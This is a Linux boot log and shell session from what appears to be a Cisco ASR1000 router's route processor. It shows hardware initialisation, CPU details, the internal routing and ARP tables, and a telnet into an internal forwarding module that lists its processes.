BIOS-e820: 000000007e86a000 - 000000007e86b000 (ACPI NVS)
BIOS-e820: 000000007e86b000 - 000000007e870000 (reserved)
BIOS-e820: 000000007e870000 - 000000007e876000 (usable)
BIOS-e820: 000000007e876000 - 000000007e878000 (reserved)
BIOS-e820: 000000007e878000 - 000000007e882000 (usable)
BIOS-e820: 000000007e882000 - 000000007e883000 (ACPI NVS)
BIOS-e820: 000000007e883000 - 000000007e88b000 (usable)
BIOS-e820: 000000007e88b000 - 000000007ea8b000 (ACPI NVS)
BIOS-e820: 000000007ea8b000 - 000000007eaae000 (usable)
BIOS-e820: 000000007eaae000 - 000000007eab1000 (ACPI NVS)
BIOS-e820: 000000007eab1000 - 000000007eab2000 (usable)
BIOS-e820: 000000007eab2000 - 000000007eabc000 (ACPI NVS)
BIOS-e820: 000000007eabc000 - 000000007eaec000 (usable)
BIOS-e820: 000000007eaec000 - 000000007eaed000 (ACPI NVS)
BIOS-e820: 000000007eaed000 - 000000007eaee000 (usable)
BIOS-e820: 000000007eaee000 - 000000007eaf1000 (reserved)
BIOS-e820: 000000007eaf1000 - 000000007eaf2000 (usable)
BIOS-e820: 000000007eaf2000 - 000000007eb2d000 (reserved)
BIOS-e820: 000000007eb2d000 - 000000007eb33000 (usable)
BIOS-e820: 000000007eb33000 - 000000007eb34000 (reserved)
BIOS-e820: 000000007eb34000 - 000000007eb35000 (usable)
BIOS-e820: 000000007eb35000 - 000000007eb36000 (reserved)
BIOS-e820: 000000007eb36000 - 000000007eb42000 (usable)
BIOS-e820: 000000007eb42000 - 000000007eb44000 (reserved)
BIOS-e820: 000000007eb44000 - 000000007eb4a000 (usable)
BIOS-e820: 000000007eb4a000 - 000000007eb50000 (reserved)
BIOS-e820: 000000007eb50000 - 000000007eb74000 (usable)
BIOS-e820: 000000007eb74000 - 000000007eb75000 (reserved)
BIOS-e820: 000000007eb75000 - 000000007eb77000 (usable)
BIOS-e820: 000000007eb77000 - 000000007eb78000 (reserved)
BIOS-e820: 000000007eb78000 - 000000007efab000 (usable)
BIOS-e820: 000000007efab000 - 000000007efac000 (reserved)
BIOS-e820: 000000007efac000 - 000000007efad000 (usable)
BIOS-e820: 000000007efad000 - 000000007efaf000 (reserved)
BIOS-e820: 000000007efaf000 - 000000007efdf000 (usable)
BIOS-e820: 000000007efdf000 - 000000007efe1000 (reserved)
BIOS-e820: 000000007efe1000 - 000000007f60d000 (usable)
BIOS-e820: 000000007f60d000 - 000000007f60e000 (reserved)
BIOS-e820: 000000007f60e000 - 000000007f618000 (usable)
BIOS-e820: 000000007f618000 - 000000007f61a000 (reserved)
BIOS-e820: 000000007f61a000 - 000000007fc00000 (usable)
BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved)
BIOS-e820: 00000000fec00000 - 00000000fec01000 (reserved)
BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved)
BIOS-e820: 0000000100000000 - 000000027fffe000 (usable)
BIOS-e820: 000000027fffe000 - 0000000280000000 (reserved)
DMI not present or invalid.
ACPI: RSDP (v002 INSYDE ) @ 0x00000000000e0000
ACPI: XSDT (v001 INSYDE BEARLAKE 0x00000003 0x01000013) @ 0x000000007e79d120
ACPI: FADT (v003 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e77d000
ACPI: MADT (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e776000
ACPI: WDDT (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e775000
ACPI: MCFG (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e774000
ACPI: HPET (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e767000
ACPI: ASF! (v032 INTEL 559/ 0x00000001 TFSM 0x000f4240) @ 0x000000007e766000
ACPI: SPCR (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e765000
ACPI: DMAR (v001 0x00000001 0x00000000) @ 0x000000007e764000
ACPI: SSDT (v001 INTEL SataAhci 0x00001000 INTL 0x20051117) @ 0x000000007e75d000
ACPI: SSDT (v001 DpgPmm CpuPm 0x00000012 INTL 0x20051117) @ 0x000000007e75c000
ACPI: SSDT (v001 DpgPmm Cpu0Ist 0x00000011 INTL 0x20051117) @ 0x000000007e75b000
ACPI: SSDT (v001 DpgPmm Cpu1Ist 0x00000012 INTL 0x20051117) @ 0x000000007e75a000
ACPI: DSDT (v001 INTEL BROADWAT 0x00000003 INTL 0x20051117) @ 0x0000000000000000
No NUMA configuration found
Faking a node at 0000000000000000-000000027fffe000
Bootmem setup node 0 0000000000000000-000000027fffe000
No mptable found.
On node 0 totalpages: 1996807
DMA zone: 1498 pages, LIFO batch:0
DMA32 zone: 447022 pages, LIFO batch:31
Normal zone: 1548287 pages, LIFO batch:31
ACPI: PM-Timer IO Port: 0x408
ACPI: Local APIC address 0xfee00000
ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled)
Processor #0 7:7 APIC version 20
ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
Processor #1 7:7 APIC version 20
ACPI: LAPIC (acpi_id[0x03] lapic_id[0x02] disabled)
ACPI: LAPIC (acpi_id[0x04] lapic_id[0x03] disabled)
ACPI: LAPIC_NMI (acpi_id[0x01] dfl dfl lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x02] dfl dfl lint[0x1])
ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0])
IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23
ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
ACPI: IRQ0 used by override.
ACPI: IRQ2 used by override.
ACPI: IRQ9 used by override.
Setting APIC routing to physical flat
ACPI: HPET id: 0x8086a201 base: 0xfed00000
Using ACPI (MADT) for SMP configuration information
Allocating PCI resources starting at 80000000 (gap: 7fc00000:60400000)
SMP: Allowing 4 CPUs, 2 hotplug CPUs
Built 1 zonelists. Total pages: 1996807
Kernel command line: root=/dev/ram rw console=ttyS1,9600 max_loop=64 SR_BOOT=bootflash:asr1000rp2-advipservicesk9.02.04.02.122-33.XND2.bin
Initializing CPU#0
PID hash table entries: 4096 (order: 12, 32768 bytes)
time.c: Using 14.318180 MHz WALL HPET GTOD HPET/TSC timer.
time.c: Detected 2660.009 MHz processor.
Dentry cache hash table entries: 1048576 (order: 11, 8388608 bytes)
Inode-cache hash table entries: 524288 (order: 10, 4194304 bytes)
Checking aperture...
PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
Placing software IO TLB between 0x1c7a000 - 0x5c7a000
Memory: 7908448k/10485752k available (2549k kernel code, 252364k reserved, 1411k data, 5188k init)
Calibrating delay using timer specific routine.. 5323.64 BogoMIPS (lpj=2661821)
Security Framework v1.0.0 initialized
Capability LSM initialized
Mount-cache hash table entries: 256
CPU: L1 I cache: 32K, L1 D cache: 32K
CPU: L2 cache: 6144K
using mwait in idle threads.
CPU: Physical Processor ID: 0
CPU: Processor Core ID: 0
CPU0: Thermal monitoring enabled (TM2)
SMP alternatives: switching to UP code
ACPI: Core revision 20060707
Using local APIC timer interrupts.
result 20781310
Detected 20.781 MHz APIC timer.
SMP alternatives: switching to SMP code
Booting processor 1/2 APIC 0x1
Initializing CPU#1
Calibrating delay using timer specific routine.. 5319.97 BogoMIPS (lpj=2659989)
CPU: L1 I cache: 32K, L1 D cache: 32K
CPU: L2 cache: 6144K
CPU: Physical Processor ID: 0
CPU: Processor Core ID: 1
CPU1: Thermal monitoring enabled (TM2)
Intel(R) Xeon(R) CPU L5238 @ 2.66GHz stepping 06
Brought up 2 CPUs
testing NMI watchdog ... OK.
migration_cost=15
ASR: rp2_RpDevRstCntrl initial 20100000 p ffffc2000000a000
ASR: cpld eusb reset done
isord_start=ffff810061eca018 isord_end=ffff81006f5ec018
NET: Registered protocol family 16
ACPI: bus type pci registered
PCI: Using MMCONFIG at e0000000
ACPI: Interpreter enabled
ACPI: Using IOAPIC for interrupt routing
ACPI: PCI Root Bridge [PCI0] (0000:00)
PCI: Probing PCI hardware (bus 00)
ACPI: Assume root bridge [\_SB_.PCI0] bus is 0
PCI: 0000:00:03.0: class 600 doesn't match header type 01. Ignoring class.
PCI: 0000:00:05.0: class 600 doesn't match header type 01. Ignoring class.
PCI: 0000:00:06.0: class 600 doesn't match header type 01. Ignoring class.
PCI: 0000:00:07.0: class 600 doesn't match header type 01. Ignoring class.
PCI: Transparent bridge - 0000:00:1e.0
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE2._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE4._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE6._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P32_._PRT]
ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 7<7>Losing some ticks... checking if CPU frequency changed.
9 *10 11 12)
ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 7 *9 10 11 12)
ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 7 *9 10 11 12)
ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 *5 7 9 10 11 12)
ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 7 9 *10 11 12)
ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 7 9 10 *11 12)
ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 7 9 *10 11 12)
ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 7 9 10 11 12) *0, disabled.
Linux Plug and Play Support v0.97 (c) Adam Belay
pnp: PnP ACPI init
pnp: PnP ACPI: found 14 devices
SCSI subsystem initialized
usbcore: registered new driver usbfs
usbcore: registered new driver hub
PCI: Using ACPI for IRQ routing
PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report
hpet0: at MMIO 0xfed00000 (virtual 0xffffffffff5fe000), IRQs 2, 8, 0, 0
hpet0: 4 64-bit timers, 14318180 Hz
PCI-GART: No AMD northbridge found.
pnp: 00:06: ioport range 0x500-0x53f has been reserved
pnp: 00:06: ioport range 0x400-0x47f could not be reserved
pnp: 00:06: ioport range 0x680-0x6ff has been reserved
PCI: Bridge: 0000:00:02.0
IO window: 7000-7fff
MEM window: 80000000-c10fffff
PREFETCH window: c1100000-c20fffff
PCI: not setting up bridge 0000:00:03.0 for bus 2
PCI: Bridge: 0000:00:04.0
IO window: 4000-5fff
MEM window: ca100000-cb1fffff
PREFETCH window: c3100000-c40fffff
PCI: not setting up bridge 0000:00:05.0 for bus 4
PCI: not setting up bridge 0000:00:06.0 for bus 5
PCI: not setting up bridge 0000:00:07.0 for bus 6
PCI: Bridge: 0000:00:1e.0
IO window: disabled.
MEM window: disabled.
PREFETCH window: disabled.
GSI 16 sharing vector 0xA9 and IRQ 16
ACPI: PCI Interrupt 0000:00:02.0[A] -> GSI 16 (level, low) -> IRQ 169
PCI: Setting latency timer of device 0000:00:02.0 to 64
PCI: Enabling device 0000:00:03.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:03.0 to 64
ACPI: PCI Interrupt 0000:00:04.0[A] -> GSI 16 (level, low) -> IRQ 169
PCI: Setting latency timer of device 0000:00:04.0 to 64
PCI: Enabling device 0000:00:05.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:05.0 to 64
PCI: Enabling device 0000:00:06.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:06.0 to 64
PCI: Enabling device 0000:00:07.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:07.0 to 64
PCI: Setting latency timer of device 0000:00:1e.0 to 64
NET: Registered protocol family 2
IP route cache hash table entries: 262144 (order: 9, 2097152 bytes)
TCP established hash table entries: 1048576 (order: 13, 33554432 bytes)
TCP bind hash table entries: 65536 (order: 9, 2097152 bytes)
TCP: Hash tables configured (established 1048576 bind 65536)
TCP reno registered
Total HugeTLB memory allocated, 0
NTFS driver 2.1.27 [Flags: R/O].
Initializing Cryptographic API
io scheduler noop registered
io scheduler anticipatory registered
io scheduler deadline registered
io scheduler cfq registered (default)
PCI: Setting latency timer of device 0000:00:02.0 to 64
assign_interrupt_mode Found MSI capability
Allocate Port Service[0000:00:02.0:pcie00]
Allocate Port Service[0000:00:02.0:pcie01]
PCI: Setting latency timer of device 0000:00:04.0 to 64
assign_interrupt_mode Found MSI capability
Allocate Port Service[0000:00:04.0:pcie00]
Allocate Port Service[0000:00:04.0:pcie01]
pci_hotplug: PCI Hot Plug PCI Core version: 0.5
ACPI: Processor [CPU0] (supports 8 throttling states)
ACPI: Processor [CPU1] (supports 8 throttling states)
ACPI Exception (acpi_processor-0681): AE_NOT_FOUND, Processor Device is not present [20060707]
ACPI: Getting cpuindex for acpiid 0x3
ACPI Exception (acpi_processor-0681): AE_NOT_FOUND, Processor Device is not present [20060707]
ACPI: Getting cpuindex for acpiid 0x4
Real Time Clock Driver v1.12ac
hpet_resources: 0xfed00000 is busy
Linux agpgart interface v0.101 (c) Dave Jones
Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled
serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
pnp: Device 00:0b disabled.
RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize
loop: loaded (max 64 devices)
libata version 2.00 loaded.
ahci 0000:00:1f.2: version 2.0
GSI 17 sharing vector 0xC9 and IRQ 17
ACPI: PCI Interrupt 0000:00:1f.2[B] -> GSI 19 (level, low) -> IRQ 201
PCI: Setting latency timer of device 0000:00:1f.2 to 64
ahci 0000:00:1f.2: AHCI 0001.0200 32 slots 4 ports 3 Gbps 0xf impl SATA mode
ahci 0000:00:1f.2: flags: 64bit ncq ilck stag pm led clo pio slum part
ata1: SATA max UDMA/133 cmd 0xFFFFC2000001C100 ctl 0x0 bmdma 0x0 irq 209
ata2: SATA max UDMA/133 cmd 0xFFFFC2000001C180 ctl 0x0 bmdma 0x0 irq 209
ata3: SATA max UDMA/133 cmd 0xFFFFC2000001C200 ctl 0x0 bmdma 0x0 irq 209
ata4: SATA max UDMA/133 cmd 0xFFFFC2000001C280 ctl 0x0 bmdma 0x0 irq 209
scsi0 : ahci
ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
ata1.00: ATA-7, max UDMA/133, 156301488 sectors: LBA48 NCQ (depth 31/32)
ata1.00: configured for UDMA/133
scsi1 : ahci
ata2: SATA link down (SStatus 0 SControl 300)
scsi2 : ahci
ata3: SATA link down (SStatus 0 SControl 300)
scsi3 : ahci
ata4: SATA link down (SStatus 0 SControl 300)
Vendor: <7>A<7>T<7>A<7> <7> <7> <7> <7> <7> Model: <7>S<7>T<7>9<7>8<7>0<7>8<7>1<7>8<7>S<7>M<7> <7> <7> <7> <7> <7> <7> Rev: <7>3<7>.<7>A<7>A<7>
Type: Direct-Access <7> ANSI SCSI revision: 05<7>
SCSI device sda: 156301488 512-byte hdwr sectors (80026 MB)
sda: Write Protect is off
sda: Mode Sense: 00 3a 00 00
SCSI device sda: drive cache: write back
SCSI device sda: 156301488 512-byte hdwr sectors (80026 MB)
sda: Write Protect is off
sda: Mode Sense: 00 3a 00 00
SCSI device sda: drive cache: write back
sda: sda1 sda2 sda3
sd 0:0:0:0: Attached scsi disk sda
sd 0:0:0:0: Attached scsi generic sg0 type 0
PCI: Enabling device 0000:00:1a.7 (0000 -> 0002)
GSI 18 sharing vector 0xD9 and IRQ 18
ACPI: PCI Interrupt 0000:00:1a.7[C] -> GSI 18 (level, low) -> IRQ 217
PCI: Setting latency timer of device 0000:00:1a.7 to 64
ehci_hcd 0000:00:1a.7: EHCI Host Controller
ehci_hcd 0000:00:1a.7: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:1a.7: debug port 1
PCI: cache line size of 32 is not supported by device 0000:00:1a.7
ehci_hcd 0000:00:1a.7: irq 217, io mem 0xcc226c00
ehci_hcd 0000:00:1a.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 6 ports detected
PCI: Enabling device 0000:00:1d.7 (0000 -> 0002)
GSI 19 sharing vector 0xE1 and IRQ 19
ACPI: PCI Interrupt 0000:00:1d.7[A] -> GSI 23 (level, low) -> IRQ 225
PCI: Setting latency timer of device 0000:00:1d.7 to 64
ehci_hcd 0000:00:1d.7: EHCI Host Controller
ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 2
ehci_hcd 0000:00:1d.7: debug port 1
PCI: cache line size of 32 is not supported by device 0000:00:1d.7
ehci_hcd 0000:00:1d.7: irq 225, io mem 0xcc226800
usb 1-2: new high speed USB device using ehci_hcd and address 2
ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004
usb usb2: configuration #1 chosen from 1 choice
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 6 ports detected
usb 1-2: configuration #1 chosen from 1 choice
Initializing USB Mass Storage driver...
scsi4 : SCSI emulation for USB Mass Storage devices
usb-storage: device found at 2
usbcore: registered new driver usb-storage
USB Mass Storage support registered.
usb-storage: waiting for device to settle before scanning
usbcore: registered new driver libusual
oprofile: using NMI interrupt.
TCP bic registered
Initializing IPsec netlink socket
NET: Registered protocol family 1
NET: Registered protocol family 17
ACPI: (supports S0 S1 S3 S4 S5)
Freeing unused kernel memory: 5188k freed
Write protecting the kernel read-only data: 917k
e1000e: Intel(R) PRO/1000 Network Driver - 0.4.1.7-NAPI
e1000e: Copyright (c) 1999-2008 Intel Corporation.
PCI: Enabling device 0000:00:19.0 (0000 -> 0003)
GSI 20 sharing vector 0xE9 and IRQ 20
ACPI: PCI Interrupt 0000:00:19.0[A] -> GSI 20 (level, low) -> IRQ 233
PCI: Setting latency timer of device 0000:00:19.0 to 64
iTCO_wdt: Intel TCO WatchDog Timer Driver v1.03 (30-Apr-2008)
iTCO_wdt: Enabling WDT ISR from init.
iTCO_wdt: Found a ICH9R TCO device (Version=2, TCOBASE=0x0460)
iTCO_wdt: initialized. heartbeat=120 sec (nowayout=0)
0000:00:19.0: eth0: (PCI Express:2.5GB/s:Width x1) 88:88:88:88:87:88
0000:00:19.0: eth0: Intel(R) PRO/1000 Network Connection
0000:00:19.0: eth0: MAC: 7, PHY: 8, PBA No: ffffff-0ff
PCI: Enabling device 0000:03:00.0 (0000 -> 0003)
ACPI: PCI Interrupt 0000:03:00.0[A] -> GSI 16 (level, low) -> IRQ 169
PCI: Setting latency timer of device 0000:03:00.0 to 64
0000:03:00.0: eth1: (PCI Express:2.5GB/s:Width x4) 00:11:22:33:44:55
0000:03:00.0: eth1: Intel(R) PRO/1000 Network Connection
0000:03:00.0: eth1: MAC: 1, PHY: 1, PBA No: ffffff-0ff
PCI: Enabling device 0000:03:00.1 (0000 -> 0003)
GSI 21 sharing vector 0x42 and IRQ 21
ACPI: PCI Interrupt 0000:03:00.1[B] -> GSI 17 (level, low) -> IRQ 66
PCI: Setting latency timer of device 0000:03:00.1 to 64
0000:03:00.1: eth2: (PCI Express:2.5GB/s:Width x4) 00:11:22:33:44:54
0000:03:00.1: eth2: Intel(R) PRO/1000 Network Connection
0000:03:00.1: eth2: MAC: 1, PHY: 1, PBA No: ffffff-0ff
ACPI: PCI Interrupt 0000:00:1f.3[C] -> GSI 18 (level, low) -> IRQ 217
GSI 22 sharing vector 0x52 and IRQ 22
GSI 23 sharing vector 0x5A and IRQ 23
cpld_driver: cp_board_type = BADDACE5
cpld_driver: mstp_subtype = 2
rmonbifo_mod: module license 'Proprietary' taints kernel.
rmonbifo.ko loaded. 0.0.3 Date Nov 4 2009 21:54:34
Copyright (c) 2005-2009 by Cisco Systems, Inc.
piso.o loaded. 0.0.2 Date Nov 4 2009 21:54:33
Copyright (c) 2006-2007 by cisco Systems, Inc.
Freeing initrd memory: 220296k freed
ISO 9660 Extensions: RRIP_1991A
Vendor: <7>S<7>M<7>A<7>R<7>T<7> <7> <7> <7> Model: <7>e<7>U<7>S<7>B<7> <7> <7> <7> <7> <7> <7> <7> <7> <7> <7> <7> <7> Rev: <7>A<7>1<7>1<7>0<7>
Type: Direct-Access <7> ANSI SCSI revision: 00<7>
SCSI device sdb: 4014080 512-byte hdwr sectors (2055 MB)
sdb: Write Protect is off
sdb: Mode Sense: 43 00 00 00
sdb: assuming drive cache: write through
SCSI device sdb: 4014080 512-byte hdwr sectors (2055 MB)
sdb: Write Protect is off
sdb: Mode Sense: 43 00 00 00
sdb: assuming drive cache: write through
sdb: sdb1 sdb2 sdb3 sdb4
sd 4:0:0:0: Attached scsi disk sdb
sd 4:0:0:0: Attached scsi generic sg1 type 0
usb-storage: device scan complete
iTCO_wdt: NMIs are not routed to SMIs
iTCO_wdt: device started at time 4294698716
iTCO_wdt: Unexpected close, not stopping watchdog!
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: RRIP_1991A
ip_tables: (C) 2000-2006 Netfilter Core Team
ip_conntrack version 2.4 (8192 buckets, 65536 max) - 280 bytes per conntrack
0000:03:00.0: eth0: Link is Up 1000 Mbps Full Duplex, Flow Control: RX/TX
0000:03:00.1: eth1: Link is Up 1000 Mbps Full Duplex, Flow Control: RX/TX
Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
iTCO_wdt: device started at time 4294713770
iTCO_wdt: Unexpected close, not stopping watchdog!
lsmpi: instance 0 lsmpi_area at 0xffff810275000000 (phys 0x27fd3e000)
lsmpi: instance 1 lsmpi_area at 0xffff810274000000 (phys 0x27fcfe000)
lsmpi version 0.2.2
PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
ACPI: PCI Interrupt 0000:01:00.0[A] -> GSI 16 (level, low) -> IRQ 169
pcie_ht_fpga: wrote 4000 to my bridge @ 0x22C
PCI: Setting latency timer of device 0000:01:00.0 to 64
pcie_ht_fpga: fpga_reg_start=c0000000 fpga_reg_len=20000
pcie_ht_fpga: scooby_reg_start=80000000 scooby_reg_len=40000000
pcie_ht_fpga: scooby_tdfifo_start=c0020000 scooby_tdfifo_len=1000
pcie_ht_fpga: rev reg=08112501
pcie_ht_fpga: HT ID=74541022
pcie_ht_fpga: HT CmdStat=00100007
pcie_ht_fpga: Scooby HT ID=74541022
pcie_ht_fpga: Scooby HT CmdStat=00100000
pcie_ht_fpga: Switching HT bus to 500MHz
pcie_ht_fpga: 1 HT LinkFreq=003f0323
pcie_ht_fpga: 1 Scooby HT LinkFreq=001d0323
pcie_ht_fpga: 2 HT LinkFreq=003f0323
pcie_ht_fpga: 2 Scooby HT LinkFreq=001d0323
pcie_ht_fpga: HT LinkFreq=003f0323
pcie_ht_fpga: Scooby HT LinkFreq=001d0323
pcie_ht_fpga: HT BAR0=00000004
pcie_ht_fpga: HT BAR1=00000000
pcie_ht_fpga: Scooby HT BAR0=80000004
pcie_ht_fpga: Scooby HT BAR1=00000000
pcie_ht_fpga: Scooby HT BAR2=c0020004
pcie_ht_fpga: Scooby HT BAR3=00000000
pcie_ht_fpga: MSI interrupt test succeeded
i2c /dev entries driver
Initializing coretemp
coretemp: Unknown CPU, 17
coretemp coretemp.0: This driver uses undocumented features of Core CPU (Intel will not disclose the information to individuals). Temperature might be wrong!
coretemp: Unknown CPU, 17
coretemp coretemp.1: This driver uses undocumented features of Core CPU (Intel will not disclose the information to individuals). Temperature might be wrong!
DDR: LOADING DRIVER
hts.o htdp loaded. 0.0.13 Date Nov 4 2009 21:54:23
Copyright (c) 2006-2009 by cisco Systems, Inc. All rights reserved
hts: mcp-rp sets hts_type to Scooby.
hts.ko: sysctl ffff81025deb4bc0
ich9_spi: Loading driver
ich9_spi: Found ATMEL_25DF321 SPI serial flash, size 4096KB
cmdlinepart partition parsing not available
ich9_spi: ICH9 Device ID 2916
hts: ERROR: lsmpi tx -NO indication
hts_cfg_init() 1: scby_pn=7b2245
hts_cfg_init() 2: scby_pn=45227b00
hts_cfg_init() 3: scby_pn=45227b00
hts_cfg_init() 4: scby_pn=7b2245
hts: hts_hw_init() Initialization of hardware done.
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
hts: ERROR: lsmpi tx -NO indication
iTCO_wdt: device started at time 4294723805
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294728062
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294733814
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294734312
iTCO_wdt: Unexpected close, not stopping watchdog!
iTCO_wdt: device started at time 4294741440
lsmpi_open: device opened by pid 21480 instance 0
lsmpi_vopen: vma 0xffff81022db86a28 region #1 mapped for instance 0
lsmpi_vopen: vma 0xffff81022db86ad8 region #2 mapped for instance 0
lsmpi_vopen: vma 0xffff81022db86298 region #3 mapped for instance 0
lsmpi_vopen: vma 0xffff81022db86348 region #4 mapped for instance 0
LSMPI: Register dual stack diverter
lsmpi_vopen: vma 0xffff81022db86818 region #5 mapped for instance 0
device liin entered promiscuous mode
device liin left promiscuous mode
ifconfig[12471]: segfault at 0000000092f7f1ef rip 0000000092f7f1ef rsp 00000000ff87d38c error 14
device liin entered promiscuous mode
device liin left promiscuous mode


Get the RP CPU details :


[ASR1k_RP_0:/]$ cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU L5238 @ 2.66GHz
stepping : 6
cpu MHz : 2664.000
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm syscall nx lm constant_tsc pni monitor ds_cpl vmx est tm2 cx16 xtpr lahf_lm
bogomips : 5323.64
clflush size : 64
cache_alignment : 64
address sizes : 38 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU L5238 @ 2.66GHz
stepping : 6
cpu MHz : 2664.000
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm syscall nx lm constant_tsc pni monitor ds_cpl vmx est tm2 cx16 xtpr lahf_lm
bogomips : 5319.97
clflush size : 64
cache_alignment : 64
address sizes : 38 bits physical, 48 bits virtual
power management:


Print the kernel IP routing table :


[ASR1k_RP_0:/]$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.2.0.0 * 255.255.0.0 U 0 0 0 eth0
10.3.0.0 * 255.255.0.0 U 0 0 0 eth1
10.0.0.0 * 255.255.0.0 U 0 0 0 eth0
10.1.0.0 * 255.255.0.0 U 0 0 0 eth1
192.168.0.0 * 255.255.255.252 U 0 0 0 liin


Check the other modules internal ips:


[ASR1k_RP_0:/]$ arp -a
cc1-0 (10.0.3.1) at 00:00:03:01:00:00 [ether] on eth0
fp-standby (10.2.0.4) at 00:00:02:01:00:00 [ether] on eth0
rp1-1 (10.1.1.1) at 00:00:01:01:00:01 [ether] on eth1
cc1 (10.2.0.101) at 00:00:03:01:00:00 [ether] on eth0
fp0-0 (10.0.2.0) at 00:00:02:00:00:00 [ether] on eth0
rp1-0 (10.0.1.1) at 00:00:01:01:00:00 [ether] on eth0
fp-active (10.2.0.3) at 00:00:02:00:00:00 [ether] on eth0
fp1-0 (10.0.2.1) at 00:00:02:01:00:00 [ether] on eth0


Telnet to one of the other modules (you can also open a shell directly from IOS) :


[ASR1k_RP_0:/]$ telnet 10.0.2.0
Trying 10.0.2.0...
Connected to 10.0.2.0.
Escape character is '^]'.

Linux 2.6.18.8 (ASR1k_ESP_0) (ttyp0)

2010/02/01 10:46:46 :

[ASR1k_ESP_0:/]$ ps -elF
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
4 S root 1 0 0 80 0 - 533 select Jan19 ? 00:00:13 init [3]
1 S root 2 1 0 99 19 - 0 ksofti Jan19 ? 00:00:00 [ksoftirqd/0]
5 S root 3 1 0 75 -5 - 0 worker Jan19 ? 00:00:01 [events/0]
1 S root 4 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [khelper]
1 S root 5 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kthread]
1 S root 21 5 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kblockd/0]
1 S root 25 5 0 75 -5 - 0 hub_th Jan19 ? 00:00:00 [khubd]
1 S root 60 5 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 61 5 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 62 5 0 75 -5 - 0 kswapd Jan19 ? 00:00:00 [kswapd0]
